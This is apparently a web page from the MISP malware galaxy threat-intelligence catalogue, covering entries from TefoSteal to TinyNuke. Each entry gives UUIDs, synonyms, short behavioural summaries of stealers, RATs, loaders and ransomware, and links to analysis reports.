- https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b - webarchive
- https://www.mandiant.com/resources/unc2452-merged-into-apt29 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/ - webarchive
- https://twitter.com/TheEnergyStory/status/1342041055563313152 - webarchive
- https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - webarchive
- https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf - webarchive
- https://www.youtube.com/watch?v=GfbxHy6xnbA - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds - webarchive
- https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714 - webarchive
- https://www.youtube.com/watch?v=LA-XE5Jy2kU - webarchive
- https://twitter.com/craiu/status/1339954817247158272 - webarchive
- https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware - webarchive
- https://www.brighttalk.com/webcast/7451/462719 - webarchive
- https://twitter.com/TheEnergyStory/status/1346096298311741440 - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html - webarchive
- https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/ - webarchive
- https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/ - webarchive
- https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html - webarchive
- https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/ - webarchive
- https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack - webarchive
- https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TefoSteal
Internal MISP references
UUID aaa05037-aee1-4353-ace1-43ae0f558091
which can be used as unique global reference for TefoSteal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TelAndExt
According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.
Internal MISP references
UUID b2b5a816-2268-4cb8-9958-491356c452ec
which can be used as unique global reference for TelAndExt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TelB
According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.
Internal MISP references
UUID daf2f70b-205e-4b39-89a6-d382ded4c33c
which can be used as unique global reference for TelB
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeleBot
Internal MISP references
UUID 06e0d676-8160-4b65-b6ea-d7634c962809
which can be used as unique global reference for TeleBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks - webarchive
- http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeleDoor
Internal MISP references
UUID b71f1656-975a-4daa-8109-00c30fd20410
which can be used as unique global reference for TeleDoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/ - webarchive
- http://blog.talosintelligence.com/2017/07/the-medoc-connection.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TelegramGrabber
Internal MISP references
UUID 48352761-a92f-43b4-931d-249ac9eae8b2
which can be used as unique global reference for TelegramGrabber
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Telemiris
Internal MISP references
UUID f39400a3-3b27-4dc6-bccd-aa277ca99f28
which can be used as unique global reference for Telemiris
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Teleport
Cisco Talos reports that this is a data exfiltration tool used by TA505.
Internal MISP references
UUID b6a2a1ea-6cdb-4cbd-a9a6-539c7db1c6de
which can be used as unique global reference for Teleport
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TellYouThePass
According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.
The program renames all encrypted files by adding the ".locked" extension and creates a ransom message in a text file called "README.html". For example, "1.jpg" is renamed by Tellyouthepass to "1.jpg.locked".
According to the cybercriminals, this ransomware encrypts data using the RSA-1024 and AES-256 cryptography algorithms.
Internal MISP references
UUID fa1dbbef-c2b0-44a2-8457-764dfc99be17
which can be used as unique global reference for TellYouThePass
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass - webarchive
- https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tempedreve
Internal MISP references
UUID 26b2c2c0-036e-4e3a-a465-71a391046b74
which can be used as unique global reference for Tempedreve
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TEMPLEDOOR
Internal MISP references
UUID 13df1034-baf2-4214-81a9-283f6219356c
which can be used as unique global reference for TEMPLEDOOR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TempStealer
According to Cyble, this is a stealer targeting several cryptocurrency wallets along with browser data.
Internal MISP references
UUID a27b7e55-6036-4c4a-96b2-0a99df878fe0
which can be used as unique global reference for TempStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Terminator RAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Terminator RAT.
Known Synonyms |
---|
Fakem RAT |
Internal MISP references
UUID b127028b-ecb1-434b-abea-e4df3ca458b9
which can be used as unique global reference for Terminator RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat - webarchive
- https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf - webarchive
- https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf - webarchive
- http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Termite
Internal MISP references
UUID c0801a29-ecc4-449b-9a1b-9d2dbde1995d
which can be used as unique global reference for Termite
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.termite - webarchive
- https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/ - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.alienvault.com/blogs/labs-research/internet-of-termites - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TerraPreter
Internal MISP references
UUID 8036e023-c765-4bd6-828f-1c8d20987843
which can be used as unique global reference for TerraPreter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terrapreter - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://www.esentire.com/web-native-pages/unmasking-venom-spider - webarchive
- https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TerraLoader
Internal MISP references
UUID ddfda5dc-a416-4cf3-b734-6aa083aa9e04
which can be used as unique global reference for TerraLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader - webarchive
- https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job- - webarchive
- https://www.esentire.com/web-native-pages/unmasking-venom-spider - webarchive
- https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/ - webarchive
- https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire - webarchive
- https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TerraRecon
According to QuoINT, TerraRecon is a reconnaissance tool that looks for specific hardware and software, targeting the retail and payment services sectors. Attributed to Golden Chickens.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraRecon.
Known Synonyms |
---|
Taurus Loader Reconnaissance Module |
Internal MISP references
UUID d8efa615-87bf-4477-8261-316215c0b637
which can be used as unique global reference for TerraRecon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon - webarchive
- https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TerraStealer
According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool targeting, for example, email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraStealer.
Known Synonyms |
---|
SONE |
StealerOne |
Taurus Loader Stealer Module |
Internal MISP references
UUID d5c9a697-c7bf-4e13-8c2e-c74465e77208
which can be used as unique global reference for TerraStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/ - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://twitter.com/3xp0rtblog/status/1275746149719252992 - webarchive
- https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TerraTV
TerraTV is a custom DLL designed to hijack legitimate TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to the Golden Chickens malware-as-a-service group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TerraTV.
Known Synonyms |
---|
Taurus Loader TeamViewer Module |
Internal MISP references
UUID 0597af12-88d2-4289-a154-191774e3f48d
which can be used as unique global reference for TerraTV
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv - webarchive
- https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9 - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://blog.minerva-labs.com/taurus-user-guided-infection - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TeslaCrypt
According to Kaspersky, detected in February 2015, the new ransomware Trojan gained immediate notoriety as a menace to computer gamers. Amongst other types of target files, it tries to infect typical gaming files: game saves, user profiles, recorded replays etc. That said, TeslaCrypt does not encrypt files that are larger than 268 MB. Recently,
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeslaCrypt.
Known Synonyms |
---|
cryptesla |
Internal MISP references
UUID bd79d5be-5c2f-45c1-ac99-0e755a61abad
which can be used as unique global reference for TeslaCrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/ - webarchive
- https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html - webarchive
- https://blogs.cisco.com/security/talos/teslacrypt - webarchive
- https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/ - webarchive
- https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack - webarchive
- https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/ - webarchive
- https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/ - webarchive
- https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/ - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf - webarchive
- https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla - webarchive
- https://community.riskiq.com/article/30f22a00 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TFlower
TFlower is a new ransomware targeting mostly corporate networks, discovered in August 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing the activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware sends a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware will also terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extension to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.
Internal MISP references
UUID bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2
which can be used as unique global reference for TFlower
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower - webarchive
- https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/ - webarchive
- https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign - webarchive
- https://www.sygnia.co/mata-framework - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Thanatos
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Thanatos.
Known Synonyms |
---|
Alphabot |
Internal MISP references
UUID 24fabbe0-27a2-4c93-a6a6-c14767efaa25
which can be used as unique global reference for Thanatos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Thanatos Ransomware
Internal MISP references
UUID 0884cf65-564e-4ee2-b4e5-b73f8bbd6a34
which can be used as unique global reference for Thanatos Ransomware
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom - webarchive
- https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/ - webarchive
- https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html - webarchive
- https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThinMon
Internal MISP references
UUID a416e88b-8fc0-41a9-bb2e-13cbcc5f22b0
which can be used as unique global reference for ThinMon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThreeByte
Internal MISP references
UUID d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4
which can be used as unique global reference for ThreeByte
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThumbThief
Internal MISP references
UUID 1df3b58a-e5d2-4d2a-869c-8d4532cc9f52
which can be used as unique global reference for ThumbThief
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThunderX
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ThunderX.
Known Synonyms |
---|
Ranzy Locker |
Internal MISP references
UUID e4be8d83-748e-46df-8dd7-0ce1b2255f36
which can be used as unique global reference for ThunderX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/ - webarchive
- https://www.picussecurity.com/resource/blog/a-detailed-walkthrough-of-ranzy-locker-ransomware-ttps - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/ - webarchive
- https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html - webarchive
- https://www.ic3.gov/Media/News/2021/211026.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Thunker
Internal MISP references
UUID e55dcdec-0365-4ee0-96f8-7021183845a3
which can be used as unique global reference for Thunker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tidepool
Internal MISP references
UUID 8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca
which can be used as unique global reference for Tidepool
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool - webarchive
- https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TigerLite
TigerLite is a TCP downloader.
It creates mutexes like "qtrgads32" or "Microsoft32".
It uses RC4 with the key "MicrosoftCorporationValidation@#$%^&*()!US" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic.
It supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.
TigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.
Internal MISP references
UUID 1fcd1afe-31ed-40c2-9262-6a6afe2a43e9
which can be used as unique global reference for TigerLite
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite - webarchive
- https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf - webarchive
- https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ - webarchive
- https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat - webarchive
- https://www.threatray.com/blog/establishing-the-tigerrat-and-tigerdownloader-malware-families - webarchive
- https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tiger RAT
This is the third-stage backdoor mentioned in the Kaspersky blog "Andariel evolves to target South Korea with ransomware". The third-stage payload was created via the second-stage payload, is interactively executed in the operation, and exists in both x64 and x86 versions. Most samples use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime: it uses an embedded 16-byte XOR key to decrypt the base64-encoded payload. The decrypted payload is another portable executable file that runs in memory. Before decrypting the payload with the hardcoded XOR key, the backdoor also checks for a sandbox environment. The backdoor has some code overlap with a known malware family, PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.
Internal MISP references
UUID 57c0d7b4-f46b-44bf-9430-75ac7d3cf2df
which can be used as unique global reference for Tiger RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat - webarchive
- https://asec.ahnlab.com/en/56405/ - webarchive
- https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html - webarchive
- https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/ - webarchive
- https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf - webarchive
- https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/ - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://www.threatray.com/blog/establishing-the-tigerrat-and-tigerdownloader-malware-families - webarchive
- https://asec.ahnlab.com/ko/56256/ - webarchive
- https://www.brighttalk.com/webcast/18282/493986 - webarchive
- https://asec.ahnlab.com/ko/58215/ - webarchive
- https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf - webarchive
- https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
tildeb
Standalone implant. Potentially tied to a framework called PATROLWAGON.
Internal MISP references
UUID 8e846ea0-a46d-47c9-96e9-1cdefd49a846
which can be used as unique global reference for tildeb
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tinba
F-Secure notes that TinyBanker, or Tinba for short, is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.
If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user's browser activity and, if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc. in the legitimate-looking page.
Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Tinba.
Known Synonyms |
---|
Illi |
TinyBanker |
Zusy |
Internal MISP references
UUID 5eee35b6-bd21-4b67-b198-e9320fcf2c88
which can be used as unique global reference for Tinba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba - webarchive
- https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan - webarchive
- http://contagiodump.blogspot.com/2012/06/amazon.html - webarchive
- https://adalogics.com/blog/the-state-of-advanced-code-injections - webarchive
- https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant - webarchive
- http://garage4hackers.com/entry.php?b=3086 - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html - webarchive
- http://www.theregister.co.uk/2012/06/04/small_banking_trojan/ - webarchive
- https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/ - webarchive
- https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/ - webarchive
- http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyFluff
TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.
Internal MISP references
UUID e044c397-8491-466b-adb7-2deead4d9eb6
which can be used as unique global reference for TinyFluff
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyLoader
Internal MISP references
UUID f7c26ca7-0a7b-41b8-ad55-06625be10144
which can be used as unique global reference for TinyLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader - webarchive
- https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak - webarchive
- https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software - webarchive
- https://www.forcepoint.com/sites/default/files/resources/files/report-tinypos-analysis-en.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyMet
TinyMet is a meterpreter stager.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyMet.
Known Synonyms |
---|
TiniMet |
Internal MISP references
UUID 075c6fa0-e670-4fe1-be8b-b8b13714cb58
which can be used as unique global reference for TinyMet
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet - webarchive
- https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/ - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/ - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/ - webarchive
- https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/ - webarchive
- https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672 - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://twitter.com/VK_Intel/status/1273292957429510150 - webarchive
- https://github.com/SherifEldeeb/TinyMet - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
TinyNuke
TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including a HiddenDesktop/VNC server and a reverse SOCKS4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on GitHub. XBot is an offspring of TinyNuke, and very similar to its ancestor.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TinyNuke.
Known Synonyms |
---|
MicroBankingTrojan |
Nuclear Bot |
NukeBot |
Xbot |
Internal MISP references
UUID 5a78ec38-8b93-4dde-a99e-0c9b77674838
which can be used as unique global reference for TinyNuke
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke - webarchive
- https://asec.ahnlab.com/en/27346/ - webarchive
- https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/ - webarchive
